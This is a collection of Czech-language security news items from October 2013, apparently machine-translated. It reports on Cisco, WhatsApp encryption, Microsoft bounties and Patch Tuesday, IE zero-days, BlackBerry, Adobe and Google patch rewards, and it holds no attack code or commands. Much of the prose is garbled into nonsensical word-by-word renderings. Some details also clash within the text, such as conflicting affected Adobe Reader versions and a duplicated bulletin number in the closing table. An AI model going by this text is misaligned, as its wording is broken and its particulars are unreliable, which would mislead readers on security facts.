ASA je sada bezpečnostních řešení, která používají uživatelé nasadit antivirus, antispam, phishingem a filtrování webu služby, mimo jiné schopnosti.

Zjištěny dvě chyby zabezpečení v FWSM software společnosti Cisco, což je typ softwaru, který zpracovává především řadu směrovačů a přepínačů pro sítě Cisco.

První z nich je jeden velký nicméně. Pokud útočník úspěšně využívá příkaz Oprávnění bezpečnostní chybu, může "mít za následek úplné kompromis důvěrnosti, integrity a dostupnosti v postiženém systému." Druhá chyba v FWSM je také přítomný v ASA a zabývá se SQL * Net kontroly funkčnosti . Stejně jako některé z chyb ASA může také vést k odmítnutí služby, pokud využívány.

Zatímco Cisco Security Incident Response produktu Team (PSIRT) není v současné době známy žádné útoky se zaměřují na zranitelnosti a řešení existují pro některé z nich, záplaty na všech chyb zabezpečení k dispozici prostřednictvím pravidelných aktualizačních kanálů.


WhatsApp Crypto Chyba vystaví zprávy
11.10.2013 Zranitelnost | Bezpečnost | Mobil

WhatsApp, populární mobilní aplikace zprávy, trpí chybou implementace kryptografických který opouští vystavené zprávy.

Thijs Alkemade, počítačová věda studuje na univerzitě v Utrechtu v Nizozemsku, který pracuje na open source projektu Adium instant messaging, odhalilo závažný problém tento týden s šifrováním slouží k zajištění WhatsApp zprávy , a sice, že stejný klíč se používá pro příchozí a odchozí zprávy.

"Měli byste předpokládat, že každý, kdo je schopen odposlouchávat vaše připojení WhatsApp je schopen dešifrovat zprávy, daný dost úsilí," napsal v úterý. "Měli byste zvážit všechny své předchozí WhatsApp napadené konverzace."

Alkemade řekl uživatelova jediné východisko je přestat používat WhatsApp dokud vývojáři vytvoří patch.

Hacker čichání rozhovor WhatsApp stačil vzpamatovat většina bajtů otevřeného textu odeslaných Alkemade řekl. WhatsApp používá RC4, pseudo-náhodné číslo generátor generovat proud bajtů, které jsou kódovány pomocí šifry xor. Ten stejný klíč se používá k zašifrování holý text a šifrový, řekl.

"To není přímo odhalit všechny byty, ale v mnoha případech to bude fungovat," Alkemade a dodal, že zprávy stejnou strukturu a jsou snadno předvídat z části holého textu, který se zjevuje.

Alkemade řekl WhatsApp také používá stejný klíč HMAC v obou směrech, což je další chyba implementace, která klade zprávy v ohrožení, ale je obtížnější využít. Dodal, že čítače TLS tím, že pomocí různých klíčů pro HMAC posloupnosti zpráv ze serveru na klienta a RC4 pro klienta k serveru zpráv.

"Existuje mnoho úskalí při vývoji streamování šifrovací protokol. Vzhledem k tomu, že nevědí, jak používat xor správně, možná WhatsApp vývojáři by měli přestat snažit to udělat sami a přijmout řešení, které bylo přezkoumat, aktualizovány a stanoveny pro více než 15 let, stejně jako TLS, "řekl Alkemade.


Microsoft Bounty Vítěz Najde výhra venku Comfort Zone

11.10.2013 Zranitelnosti | Zabezpečení

Dejte Jamese Forshaw dobrou logickou chybu přes paměť zabezpečení týkající se poškození kterýkoliv den v týdnu.

Australský vědec říká, že by raději pracovat s nedostatky v kódu vylézt z karantény zabezpečení aplikace, než zase fuzzer proti kusu softwaru a rozpoznat nevracení paměti. Ale motivována nedávným oznámením společnosti Microsoft, že to bylo nabízí velké peníze pro nové zmírnění by-pass technik, Pokušení bylo příliš velké pro Forshaw nechat ujít.

Odměna přišla v úterý, kdy po šesti týdnech výzkumu a laděním kód zneužití, byla Forshaw získal 100.000 dolary na as-of-přesto nejmenovaný obchvatu paměťových ochrany systému Windows . Většina peněz, spolu s podobným 9400dolar Internet Explorer odměnu vyplacenou v pondělí půjde na zabezpečení zaměstnanců Forshaw v kontextové informace Londýna financovat bezpečnostní výzkumný tým tam.

"[Microsoft] má skoro zakázala mě uvedením každý detail," řekl Forshaw. "Co mohu sdílet je, že přemostění pro řadu platforem zmírňování, které vám umožní dostat spuštění kódu bez trápí DEP a ASLR."

Zabránění spuštění dat a rozvržení adresního prostoru randomizace jsou Exploit ke zmírnění dopadů na domácí v systému Windows a další operační systémy, které mají zabránit spuštění kódu v oblastech paměti, kde to by nemělo. Četné využije, včetně nedávného Internet Explorer nulové den, byli schopni porazit nebo obcházet obě skutečnosti snižující závažnost rizika, ale to neznamená, že to není výzva pro výzkumné pracovníky a hackery podobně.

"Takže jsem napsala exploity, které jdou po těchto druhů technologií v minulosti, existují různé způsoby, jak porazit ASLR a DEP získat úniku informací nebo si dll práce, které nejsou ASLR povoleno (např. IE nula den podařilo) , "řekl Forshaw. "Ale já jsem spíš nálezce logických chyb, než poškození paměti."

Začátkem tohoto roku na Pwn2Own, Forshaw inkasoval s exploitu Java pro zabezpečení v důvěryhodné třídě v rámci Java , která mu umožnila obejít pískoviště a vzdáleně spustit kód . To byla chyba Java oprava v dubnu s vydáním Java 7u21 a výzkumník vysvětlil v blogpost krátce nato, že jeho kód mu dovolil vypnout bezpečnostní manažer v Javě a spuštění škodlivého kódu jako důvěryhodné.

Microsoft inženýr Thomas Garnier také podobný útok jako ten předložené Forshaw, ale Microsoft senior bezpečnostní stratég Katie Moussouris řekl Forshaw Vstup byl hodný plnou výplatu, poprvé od bounty byl oznámen.

"Microsoft inženýři jako Thomas se neustále hodnotí způsoby, jak zlepšit bezpečnost, ale Jamesův podání byl tak kvalitní a nastínil některé další varianty takové, že jsme chtěli udělit mu plnou odměnu 100.000 dolar," řekl Moussouris.

Forshaw řekl, že tři týdny jsme dělali výzkum vztahující se k jeho obchvatu.

"Jednou jsem přišel s něčím, co jsem cítil, byl životaschopný, jsem předložil, a dozvěděl před dvěma týdny Microsoft přijal vstup," řekl Forshaw. "Myslím, že jsem byl trochu asi o 50 procent, že to bude přijato. Bylo tam pár věcí, které nebylo zcela jasné, z pravidel, zda by splňovaly jejich bar. K dispozici je sedm kritéria splňují, a cítil jsem se s nimi setkal vůbec, ale to bylo trochu napjaté době. "

Podle společnosti Microsoft, bypass podání musí prokázat nový způsob využití vzdálené spuštění kódu v systému Windows a musí být schopen využívat aplikaci, která využívá stack a heap korupci zmírňování stejně jako code-exekučního zmírňování. Bypass musí také splňovat sedm kritérií: musí být obecně v tom, že je použitelná pro více než jeden zranitelnosti poškození paměti, exploit musí být spolehlivé a mají přiměřené požadavky, musí být použitelné pro vysoce rizikové aplikace, jako prohlížeče nebo dokumentu čtenář, ale musí být na žádosti uživatelského režimu, ale musí také zaměřit na nejnovější verzi produktu společnosti Microsoft, a to musí být román, uvedl Microsoft.

"To byl aspekt novosti Bál jsem se o," řekl Forshaw. "Nemohl jsem se s jistotou říci, nikdo nikdy používal předtím. Udělal jsem due diligence na mé technice, zda to bylo publikována nebo jinak použita v hněvu předtím. Nemohl jsem najít nic. "

Při výhře více než 100000 dolarů tento týden mohou držet účetní v kontextu s úsměvem, Forshaw také vzal spokojenost s vědomím, že je na podobné dráze jako inženýr Microsoft intimní s kódem Windows.

"Existuje poměrně chytří lidé Microsoftu aktivně při pohledu na tyto věci. Bití je je docela problém, "Forshaw a dodal, že mnohem raději tyto typy defenzivní orientovaných soutěžích. "Myslím, že je to určitě zajímavý přístup, aby se, více se zaměřit na obranný než útočné straně. Pouze Microsoft je v pozici, aby to udělal, Google by mohl být schopný také s Chrome OS. Microsoft je moudré zvolit tento přístup oproti all-out free-for-all najít chyby. "


WhatsApp šifrování chyba ukázalo, POC zveřejněny kód

10.10.2013 Zranitelnosti | Zabezpečení

Holandský výzkumník říká, že řešení pro šifrování provádí populární multiplatformní IM služby WhatsApp je vadný. Tvrdí, že společnost nemyslel to tak dobře, jak by měl, a že uživatelé by si měli uvědomit, že jejich WhatsApp zprávy by mohly být snadno dešifrovat útočníky. WhatsApp má svůj spravedlivý podíl problémů Ochrana osobních údajů a společnost zavedla zprávu Šifrování v srpnu 2012, ale nebyla specifikována, co šifrovací metoda je použita. Nyní, díky Thijs Alkemade, informatika a matematika student na univerzitě v Utrechtu a Lead Developer pro Adium, open-source IM klienta pro Mac OS X, víme, že Nejenže WhatsApp používat stejný (RC4) šifrovací klíč pro zprávy v obou směrech, ale také stejný HMAC klíč pro ověření zprávy. "Ale MAC samo o sobě nestačí k odhalení všech forem manipulace: útočník mohl klesnout specifické zprávy, které je swap, nebo dokonce přenášet je zpět odesílateli, "řekl poukazuje . TLS pulty tím, že včetně pořadové číslo ve formátu prostého textu každé zprávy a pomocí jiného klíče pro HMAC pro zprávy ze serveru na klienta a zpráv od klienta k serveru. WhatsApp nepoužívá takový čítač sekvencí, a to opakovaně klíč použitý pro RC4 pro HMAC. " Aby jí dokázal svou pravdu, on také vytvořil skript v Pythonu, který může zachytit zprávy WhatsApp a která se snaží dešifrovat příchozí zprávy hádat vłechna odchozí zprávy. Když po reprodukovat výsledky s úřední client WhatsApp, on pokračoval s výzkumem a prokázaly , že oficiální Android a Nokia S60 klienti jsou tak zranitelné. "Měli byste předpokládat, že každý, kdo je schopen odposlouchávat vaše připojení WhatsApp je schopen dešifrování zpráv, daný dost úsilí. Měli byste zvážit všechny své předchozí WhatsApp ohrožena rozhovory, "dodal s tím, že WhatsApp uživatelé nemohou dělat nic, aby se ochránili - kromě přestat používat aplikace, dokud nebude možné aktualizovat odstranit nedostatky. Zdá se, že řešení je jednoduché: Vývojáři by měli zvážit použití "řešení, která byla přezkoumána, aktualizována a stanoveny pro více než 15 let, jako TLS."


Neočekávaný IE Zero Day užívaných v bankovnictví, hry Útoky
10.10.2013 Zranitelnosti | Hacking | Bezpečnost

Jednalo se o dva-pro-jeden obchod, který správcům systému Windows mohl udělat bez.

Již očekával jednu náplast Internet Explorer zero-day aktivně využívány, správci dostali opravy pro dva nula dní místo dnes jako součást října 2013 Microsoft aktualizace Patch Tuesday zabezpečení.

Druhý překvapivě, zejména organizace již kymácející se ve větru bez náplasti po dobu jednoho IE chyby použitého v aktivních útoků, a pro které Metasploit exploitu byl k dispozici. Bonus oprava byla pro nepříbuzného chyby ve volné přírodě na blízko měsíčně a také zaměření organizace v Japonsku a Koreji, podobně jako první den nula.

Vědci z Národního Cyber ​​bezpečnostního střediska v Nizozemsku, IOprotect GmbH a Trustwave SpiderLabs byly připsány v poradenských společností Microsoft za oznámení chyby zabezpečení. SpiderLabs "ředitel bezpečnostního výzkumu Ziv Mador řekl Threatpost společnosti výzkumníci byli sledování útoku server, který měl ještě před dvěma týdny byla slouží využije pro záplatami zranitelností pouze. To se změnilo na 12 září, Mador řekl, když provozují IE 8 probublává na povrch, že jeho vědci předtím neviděl.

"To se používá k distribuci malwaru obecný," řekl Mador. "Na rozdíl od předchozího nulové den v IE, tohle distribuuje malware krást přihlašovací údaje z online hráčů, nebo přerušit přístup na stránky bank. Je to obecně malware, ne cílené útoky. "

Dříve hlášeny IE nula den byly použity ve velmi cílené útoky proti japonským mediálních společností. Mediální stránky byly ohroženy jako součást útoku zalévání děr a sloužili využije, podle výzkumníků na FireEye, zaměřených na vládu, high-tech a výrobních organizací v Japonsku. FireEye nazval rozsáhlý shromažďování informací operace.

Microsoft se pustil Fix-It nástroj jako dočasný zmírnění na odhalení, že útoky byly v divočině. Minulý pátek byl exploit Metasploit modul přidá do nástrojů, stupňovat možnost, že rozšířenější útoků by mohla být na spadnutí.

Druhý den nula cílené uživatele v Japonsku a Koreji přes drive-by download. Jeden rys je jeho schopnost identifikovat jazyk infikovaný počítač byl nakonfigurován tak, aby. Pokud ani Japonec Korejský ani by IE přesměrovat na Google a útok by byla ukončena, Trustwave řekl blogpost.

Nicméně, pokud se ověřuje jazyka a IE 8, útok používá ROP řetězy obejít ochranu nativní paměti na Windows, jako je DEP a ASLR.

Útok náklad obsahuje ne méně než 10 řidičů, spustitelné soubory a DLL klesl na oběti stroj, Trustwave řekl. Pokusí se zakázat řadu bezpečnostních produktů na počítači, přesměrování bankovní weby k útočníkovi kontrolované oblasti a také komponenty, které se snaží ukrást herní pověření.

"Exploit není triviální a tyto typy využije často nejsou triviální. Vyžadují řadu velmi kreativních kombinací do práce, "řekl Mador. "To byl ten případ."

Kromě ROP řetězců, útok také používá element modelu DOM vlastností Spray techniky používané v jiných IE nula den opravenou včera.

"Existuje milion způsobů, jak rozvíjet HTML stránky nebo webové aplikace, tolik atributů, tagy, skripty. Lidé, kteří vyvíjejí prohlížeče budou muset vypořádat s obrovským množstvím možných scénářů, "Mador řekl a ukázal na množství přírodních míst, kde zranitelná kód by mohl skrývat v parsování a vykreslování některé z těchto složek.

"Když se podíváme na kód zneužití je pro prohlížeče zranitelnosti, často používají podivné kombinace z hlediska HTML, které nedávají smysl," řekl Mador. "Nezdá se, že ukázat něco zajímavého, ale účel kombinací je vyvolat nějakou chybu zabezpečení v kódu syntaktické analýzy nebo správu paměti."

Patch byl součástí kumulativní aktualizace pro IE řešena v MS13-080 , tj. byla oprava téměř každý měsíc v roce 2013, včetně mimo pásmo náplasti na začátku tohoto roku.


Google platit odměny záplat na open source projektů
10.10.2013 Zranitelnosti | Bezpečnost

Google, jeden z prvních společností, které nabízejí významné chyby nájemný programu , rozšiřuje své odměny výzkumných a vývojových pracovníků, kteří se podílejí záplaty různých open-source projektů a mají vliv na bezpečnost projektu.

Nové odměny budou pohybovat od $ 500 až $ 3,133.70, a jsou výsledkem společnosti hledají nové způsoby, jak zlepšit bezpečnost svých klíčové součásti, jako je Chrome OS a prohlížeč Chrome. Google má zranitelnosti věrnostní program pro ty nabídky již několik let, a přilákaly velké množství příspěvků. Poznámky k vydání nových verzí Chrome, například, často úvěr litanie externí badatele k předkládání chyb. Odměny jsou často na $ 1000 až 3000 dolar rozsahu, ale může vyletět do desítek tisíc za zvlášť závažných chyb.

Ale rozšíření programu je důkazem toho, jak těžké to může být zabezpečených aplikací, zejména open source projekty, které se spoléhají na kódu z různých zdrojů. Takže Google bude nyní platit vývojářům odměny pro zlepšení bezpečnosti vztahující se k věci, jako OpenSSL, OpenSSH a svázat.

"Ať už chcete přejít na bezpečnější alokátoru, přidat oddělení výsady, uklidit spoustu povrchní volání strcat (), nebo i jen k tomu, aby ASLR - chceme pomoci!" Michal Zalewski týmu Google bezpečnosti uvedl v blogu .

"Máme v úmyslu zavést program postupně, na základě kvality obdržených podání a zpětná vazba od komunity vývojářů."

Komponenty, které jsou součástí programu, v počáteční fázi jsou:

Základní služby síťové infrastruktury: OpenSSH, BIND, ISC DHCP
Základní infrastruktura analyzátory obrazu: libjpeg libjpeg-turbo, libpng, giflib
Open-source základy Google Chrome: chrom, Blink
Ostatní velkým dopadem knihovny OpenSSL, zlib:
Security-kritické, běžně používané komponenty jádra systému Linux (včetně KVM)
Za účelem získání nároku na odměnu od Google, oprava podání od developera musí mít prokazatelný ", významné a proaktivní dopad na bezpečnost" daného komponentu. Program se vztahuje i na vývojáře, kteří pracují na projektech i externí vývojáře, kteří prostě vidí problém, že chcete pomoci opravit. Chcete-li nárok na odměnu, předložený náplast je vlastně loď.

Kromě odměnu až do výše $ 3,133.7 Google může zaplatit vyšší odměny pro opravdu chytré podání.

"Můžeme zvolit vyšší odměny za neobvykle chytrý nebo komplexní podání, můžeme také rozdělit odměnu mezi zadavatelem a správcům projektu v případech, kdy oprava vyžaduje značné další úsilí jménem vývojového týmu," jsou pravidla pro Program říct.

Vývojáři předložit své záplaty přímo správci daného projektu, a jakmile se náplast ve skutečnosti je dodáván jako součást projektu, jednoduše pošlete email na Google s detaily.


BlackBerry Opravuje chyby zabezpečení vzdálené spuštění kódu v BES10
10.10.2013 Mobil | Zranitelnost | Bezpečnost
Microsoft a Adobe nebyli jedinými podniky uvolnění aktualizací zabezpečení včera. BlackBerry hromadí na opravy průvodu s aktualizací pro své BlackBerry Enterprise Service 10 mobilních produktů pro správu zařízení, kterým se stanoví umožňující vzdálené spuštění kódu.

Problém spočívá v univerzální služby zařízení (UDS), který je nainstalován ve výchozím nastavení v aplikaci BlackBerry Enterprise verze služeb (BES) 10,0 až 10.1.2. Pokud má útočník přístup k podnikové síti, která je hostitelem UDS a určit jeho adresu, mohou spustit kód jako BES10 admin účtu služby bez oprávnění.

To je proto, JBoss, BES10 open source hosting prostředí, je špatně nastaven. Ve své současné inkarnaci, JBoss umožňuje non-admin uživatelům nahrávat balíčky a učinit je k dispozici klientům. V případě úspěšného zneužití zranitelnosti také umožňuje útočníkům spustit libovolný kód.

Zní to snadněji řekne, než udělá ačkoli.

"Aby bylo možné tuto chybu zabezpečení zneužít, musí útočník použít vzdálené volání metod (RMI) rozhraní slouží škodlivý balíček JBoss z druhého serveru v síti, která není blokována firewallem," píše BlackBerry Poradní.

Pokud z nějakého důvodu BlackBerry uživatelé nemohou aktualizovat svůj systém hned, existuje řada zástupná řešení, za "dočasná opatření", Blackberry, které mohou uživatelé sledovat. Tyto zahrnují zmírnění dopadů na ladění rozhraní RMI, blokování určitých portů a aktualizace Java.

BlackBerry je BES10 je mobilní zařízení, řešení pro správu, který umožňuje IT profesionálům kontrolovat BlackBerry svých uživatelů zařízení, zařízení se systémem Android a iOS. Administrátoři mohou instalovat a odebírat licence, spravovat účty a provádět ze dne na den administrativních úkolů se službou.

Zatímco oni si není vědomo žádných útoků zneužití této chyby, BlackBerry nabádá každého podniku servis 10 administrátorům aplikovat aktualizaci softwaru, která vydala včera na její stránce znalostní báze Knowledge Base .


Microsoft exceedes 100 bulletiny pro rok 2013
10.10.2013 Zranitelnosti | Analýza

Byl to zajímavý měsíc pro Microsoft diváků zabezpečení na světě. Pokud je vaše práce závislá na zajištění systémů se systémem Windows, měli byste se netrpělivě čekají na opravu pro Internet Explorer (IE) 0-day (CVE-2013-3893: SetMouseCapture Use-po-Free) zranitelnosti v dnešním Patch Tuesday (MS13-080 ). Zneužití této chyby zabezpečení byla zjištěna první cílené, regionálně omezené využití, a později v širším použití, pokud se kód exploitu rozšířila do různých veřejných místech. Doufejme, že uživatelé nainstalovali Microsoft fixit a / nebo Emet zmírňování, a možná dokonce i vyzkoušel s Metasploit modul, který vyšel minulý týden. To, co asi nevíte, pokud pracujete v Security Response společnosti Microsoft nebo mají připojení na to, co člověk by se dalo nazvat "Advanced Persistent Threat," je to, že z devíti dalších IE zranitelnosti opravené MSFT tento měsíc, tam je druhý IE 0-day, který také byl zaznamenán na použití v cílené využívání. To je CVE-2013 - 3897. Nyní, to neznamená, že zbývajících osm IE chyby nejsou potenciálně stejně špatné nebo ještě horší. Nicméně, alespoň v této době, nejsou známo, že v použití "špatné lidi." MS13-081 adresy exploit cesta (CVE-2013 až 3128), který by útočník kernel-level přístup do systému, který pokusy o proměnu stránku obsahující škodlivý písmo OpenType. Technicky jeden z CVEs v MS13-082 řeší variantu téže věci, které Microsoft zjištěné auditem použití daného kódu. V tomto případě je varianta by poskytnout pouze na úrovni uživatele přístup k tomuto útočníka. V současné době je tento problém není známo, že se v aktivní využití. Tento informační zpravodaj obsahuje také šest dalších zranitelností různé závažnosti. MS13-083 vypadá opravdu zábavné jeden - dálkové ovládání, server-side zranitelnosti nabízí vzdálené spuštění kódu, který je zasažitelný přes ASP.net webových stránek. Jedná se o originální výrobek, skutečný, upřímný k dobru, potenciálně "wormable" stavu. Pokud jsou "špatní" vymyslet způsob, jak automatizovat vykořisťování, mohli se rychle šíří a hloubkové ochrany opatřeních vaší organizace budou testovány. Nicméně, tato zranitelnost soukromými osobami společnosti Microsoft a není známo, že je předmětem aktivního využití. Na vrcholu toho všeho, že existují čtyři MS Office zranitelností. Tyto problémy byly pouze označeny jako "důležité" pro toho či onoho důvodu. Nepoužívejte ignorovat, ale oprava další problémy v tomto měsíci poradní prvním případě budete muset provést tento druh rozhodnutí. Autor: Ross Barrett, Senior Manager, Bezpečnostní technika, Rapid7.


Webroot dodává údaje, identity a ohrožení ochrany
9.10.2013 Zranitelnosti | Bezpečnost | Ochrana

Webroot vydala nejnovější aktualizace svého Webroot SecureAnywhere portfolia. Nejnovější verze přináší novou technologii detekce zablokovat vznikající malware a phishingu rychleji, zcela přepracované rozhraní pro snadné monitorování a kontrolu, a rozšířené platformy podporu sjednotit ochranu v PC, Mac a Android a iOS zařízení.

Mezi další vylepšení patří filtrování webového obsahu, rozšířenou správu webu, pokročilé uživatelské ověřování a integrace Backup & Sync s Webroot prostředí průzkumníka Windows. cloudu Webroot SecureAnywhere detekce hrozeb nabízí připojených spotřebičů alternativu k tradiční bezpečnostní řešení, které se ukázaly neúčinné proti dnešní malware, a způsobil výrazné zhoršení výkonnosti pomalu-sestřelí na zařízení, které byly určeny k ochraně. phishingových útoků často spoof legitimní stránky, a většina phishingových stránek jsou aktivní pouze po dobu několika hodin, zmizí poté, co jste získali cílové bankovní obchody pověření , hesla nebo jiné citlivé údaje. To je jako hlavní bezpečnostní riziko neuvěřitelně obtížné sledovat. Webroot SecureAnywhere ochrana představuje real-time anti-phishing technologie rychle analyzovat webové stránky, když je konkrétní uživatel přístup a automaticky zablokovat, pokud je phishing. Webroot zavedla Nová hrozba detekční jednotka s názvem Infrared. Využití dat z Webroot Intelligence Network (WIN) cloud bezpečnostní služba, Webroot infračervené analýzy neznámých souborů korelací jejich chování a původ, a pak je posouzení rizikovosti před soubor je povoleno spustit. Webroot Infrared engine upravuje ochranu jednotlivých zařízení na základě kombinované analýzy operačního systému, aplikací a před hrozbami, které byly pozorovány.


Další Patch Tuesday aktualizace (Adobe, Apple)

9.10.2013 Zranitelnosti

Adobe vydala dva bulletiny dnes:

APSB13-24: Aktualizace zabezpečení pro RoboHelp http://www.adobe.com/support/security/bulletins/apsb13-24.html

Nepamatuji vidět předběžnou Vyhlášení pro tento jeden. Tato aktualizace opravuje libovolný spuštění kódu (CVE-2013-5327). RoboHelp je k dispozici pouze pro Windows.

APSB13-25: Aktualizace zabezpečení pro aplikace Adobe Acrobat a Adobe Reader http://www.adobe.com/support/security/bulletins/apsb13-25.html

Tato aktualizace opravuje problém, který byl zaveden v nedávné aktualizaci a JavaScript účinky bezpečnostních kontrol. V důsledku toho se zobrazí pouze verze 11.0.4 ovlivněna, žádné předchozí verze. Pouze Windows verze těchto nástrojů Adobe jsou ovlivněny.

Apple vydal iTunes 11.1.1 dnes. Příslušné bezpečnostní stránka ještě nebyla aktualizována, ale očekávají, že odkaz na zabezpečení obsahu této aktualizace v rámci příští den, nebo tak. http://support.apple.com/kb/HT1222 . Tato aktualizace se týká pouze Windows. Záplaty pro iTunes na Mac OS X se obvykle vydána jako součást aktualizace OS X.


Vědecko-výzkumný pracovník odnese $ 100K cenu Microsoft pro nový útok
8.10.2013 Zranitelnosti
Jeden den poté, co oznámil, že to zaplatil vědcům 28.000 dolar za nahlášení řadu chyb v aplikaci Internet Explorer 11, Microsoft odhalil, že napsal mnohem větší kontrolu-tentokrát za $ 100,000 na výzkumníka, který objevil novou útočnou techniku, která obchází všechny z Exploit zmírňování na nejnovější verzi systému Windows.

James Forshaw, výzkumník, který také získal odměnu v IE 11 nájemného programu letos v létě, předložila techniku ​​společnosti Microsoft, který je ověřen. Odměnou je součástí společnosti programu bug bounty , které incentivizes výzkumníky k hledání nových útočných technik, které mohou porazit moderní anti-Exploit technologií, jako je DEP a ASLR implementované v systému Windows. Program byl vyhlášen v červnu, ale Forshaw je technika je první, kdo nárok na 100.000 dolar výplaty.

Microsoft úředníci říkali, že jedním z firmy bezpečnostních techniků objevil část techniky stejně, ale to nezabránilo Forshaw z vítězství odměnu. Katie Moussouris, senior bezpečnostní stratég společnosti Microsoft, řekl, že společnost nebude zveřejňovat podrobnosti o technice Forshaw, dokud inženýři měli možnost analyzovat a implementovat obrany v systému Windows.

"Shodou okolností, jeden z našich vynikajících inženýrů společnosti Microsoft, Thomas Garnier, také našel variantu této třídy útoku techniky. Microsoft inženýři jako Thomas se neustále hodnotí způsoby, jak zlepšit bezpečnost, ale Jamesův podání byl tak kvalitní a nastínil některé další varianty takové, že jsme chtěli udělit mu plnou odměnu 100.000 dolar, "řekl Moussouris.

"I když nemůžeme jít do detailů této nové techniky ke zmírnění bypass, dokud jsme to řešit, jsme rádi, že budeme moci lépe chránit zákazníky tím, že vytvoří nové obrany na budoucích verzích našich produktů, protože jsme se dozvěděli o této technice a jeho varianty. "

100,000dolar věrnostní program je pokračující jeden, jehož prostřednictvím společnost Microsoft si klade za cíl podnítit výzkumníky k hledání nových útočných technik, které mohou dostat přes state-of-the-art exploit zmírňování. Je to poprvé, co společnost Microsoft nabídla peněžní odměny pro zranitelnost nebo informace o útoku, po společnosti úspěšné modrý klobouk soutěže Prize, který platil velké odměny pro nové obranné techniky. Moussouris, který stojí v čele práci na obou Blue Hat ceny a bug bounty programem, uvedl, že společnost je motivován, aby pomohly najít a chránit uživatele proti velkým classes útoků, spíše než jednotlivé chyby.

"Jsme nadšeni, že jim tato kvalifikační Mitigation Nepoužívat Bounty podávání během prvních tří měsíců naší štědrosti nabídky. Jamesův vstup nám pomůže zlepšit naše platforma pro celou obranu av konečném důsledku zlepší bezpečnost pro zákazníky, protože nám umožňuje identifikovat a chránit před celou třídu problémů, "řekla.


Adobe Reader záplaty, Acrobat, RoboHelp Chyby nesouvisí s Starobylý Porušení
8.10.2013 Zranitelnosti | Bezpečnost
Adobe, stále vzpamatovává z veřejného zpřístupnění masivní porušení zdrojového kódu a informace o zákaznících , vydal dvě potenciální bezpečnostní rizika upozorňováni chyby dnes záplatování které nesouvisí s aktuální vloupání.

První se týká zranitelnosti v Adobe RoboHelp 10 pro systém Windows , které by mohlo útočníkovi dovolit vzdáleně spustit škodlivý kód na základním systému podporujícího software. RoboHelp 10 je publikování software, který umožňuje uživatelům spolupracovat rozvíjet HTML 5 stránek. Obsah může být dodány do jiných softwarových formátů, jako je PDF a mobilní aplikace.

Adobe dává tuto chybu zabezpečení, relativně nízkou prioritu rating 3 a řekl, že si není vědom žádné veřejné zneužití této chyby. Aktualizace zabezpečení lze nalézt zde .

Druhá aktualizace záplaty na javascript problém v aplikaci Adobe Acrobat a Reader . Verze pro Windows 11.0.05, že oba výrobky jsou ovlivňovány, starší verze nejsou citlivé na stejný problém. Adobe dodal, že nejsou veřejně známé exploity jsou k dispozici pro tuto chybu zabezpečení.

"Tyto aktualizace řeší regresi, k nimž došlo ve verzi 11.0.04 ovlivňuje Javascript bezpečnostních kontrol," řekl Adobe.

Adobe, mezitím se nevyjádřil dále na porušení, která byla zveřejněna minulý čtvrtek. Společnost byla ohrožena někdy mezi červencem 31 a 15 srpna, a útok nebyl objeven Adobe až 17.září. Společnost odhalil, že kromě hackerů přístup zdrojový kód pro řadu produktů, včetně ColdFusion serveru Adobe webových aplikací, Acrobat, Publisher a případně jiné produkty, v blízkosti tři miliony záznamů o zákaznících, včetně šifrovaných čísla kreditních karet, byly ukradeny.

V pátek vyšlo najevo, že gang za útoky Adobe se infiltrovali také další velké společnosti , které byly v procesu, kdy byla informována. Útočníci byli aktivní po většinu roku s použitím ColdFusion využije zasáhnout celou řadu vysoce hodnotných cílů. ColdFusion byla oprava několikrát Adobe letos bude jako daleká záda jak 4.ledna, když společnost oznámila, že využije ColdFusion byl ve volné přírodě v neopravených chyb v softwaru.

"Já bych charakterizoval porušení jako jeden z nejhorších v historii Spojených států, protože zdrojový kód výrobku pro koncového uživatele, jako je Adobe Reader a Adobe Publisher byla porušena a unikly," řekl Alex Holden HOLD bezpečnosti LLC, který spolu s bezpečnostním reportérem Brian Krebs odhaleno a objasněno 40GB skrýš dat Adobe dispozici on-line. "To umožní další útoku, aby se objevil a viry, které mají být napsáno, pro které neexistují žádné obrany.

"Tento gang je sofistikovaný a některé nové věci mohou následovat, jsem si jistý," řekl Holden. "K úniku zdrojového kódu a útoky pocházejí z této situace může být zničující."


Microsoft říjen 2013 Patch Tuesday

8.10.2013 Zranitelnosti

Přehled oprav 10. 2013 Microsoft a jejich stav.

# Ovlivněno Kontraindikace - KB Známé Využije Microsoft hodnocení (**) ISC hodnocení (*)
klienti servery
MS13-080 Kumulativní aktualizace zabezpečení pro aplikaci Internet Explorer
(Nahrazuje MS13-069 )
Internet

KB 2879017 Ano. Závažnost: Kritická
zneužitelnosti: 1 Patch NYNÍ! Kritický
MS13-081 Chyby ve Ovladače režimu jádra systému Windows by mohla umožnit vzdálené spuštění kódu
(Nahrazuje MS13-076 MS13-078 MS13-054 MS13-046 )
Ovladače režimu jádra (OpenType Font Syntaktická analýza a další) CVE-2013-3128 CVE-2013 - 3,2 tisíce CVE-2013-3879 -CVE 2013-3880 CVE-2013-3881 CVE-2013-3888 CVE-2013-3894

KB 2870008 Ne. Závažnost: Kritická
zneužitelnosti: 1,2 Kritický Důležitý
MS13-082 Chyby zabezpečení v rozhraní. NET Framework mohou umožnit vzdálené spuštění kódu
(Nahrazuje MS13-040 MS11-100 MS13-052 )
Microsoft. NET Framework (OpenType) CVE-2013-3128 CVE-2013-3860 CVE-2013-3861

KB 2878890 CVE-2013-3861 byl veřejně zpřístupněn. Závažnost: Kritická
zneužitelnosti: 1,2,3 Kritický Importantl
MS13-083 Chyba zabezpečení ve Windows Common Control Library umožňuje vzdálené spuštění kódu
(Nahrazuje MS10-081 )
Windows Common Control Library (64 bit verze) DSA_InsertItem funkce používané v webapps CVE-2013-3195
KB 2864058 Ne. Závažnost: Kritická
zneužitelnosti: 1 N / A Kritický
MS13-084 Chyby zabezpečení v aplikaci Microsoft SharePoint Server by mohla umožnit vzdálené spuštění kódu
(Nahrazuje MS13-067 )
Sharepoint CVE-2013-3889 CVE-2013-3895

KB 2885089 Ne. Závažnost: Důležité
zneužitelnosti: 3,2 N / A Kritický
MS13-085 Chyby zabezpečení v aplikaci Microsoft Excel umožňují vzdálené spuštění kódu
(Nahrazuje MS13-072 MS13-072 )
Excel CVE-2013-3889 CVE-2013-3890

KB 2885080 Ne. Závažnost: Důležité
zneužitelnosti: 1,2,3 Kritický Méně důležité
MS13-086 Chyby zabezpečení v aplikaci Microsoft Word umožňují vzdálené spuštění kódu
(Nahrazuje MS13-072 )
Word CVE-2013-3891 CVE-2013-3892

KB 2885084 Ne. Závažnost: Důležité
zneužitelnosti: 1,3 Kritický Méně důležité
